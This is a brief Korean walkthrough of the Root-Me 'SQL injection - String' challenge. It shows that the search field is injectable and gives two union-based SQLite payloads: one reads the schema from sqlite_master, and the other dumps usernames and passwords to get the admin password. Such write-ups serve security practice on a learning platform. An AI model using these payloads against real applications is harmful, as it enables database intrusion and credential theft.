rootme - SQL injection - String

 

 

문제 페이지는 접속하면

 

검색하는 부분에서 sqli가 터집니다.

 

해당 부분에서 union sqli 를 해줍니다.

 

>> 1' union select 0,sql from sqlite_master--

 

users 라는 테이블명을 알아낼 수 있고

 

>> 1' union select username, password from users --

 

admin의 password를 알 수 있습니다.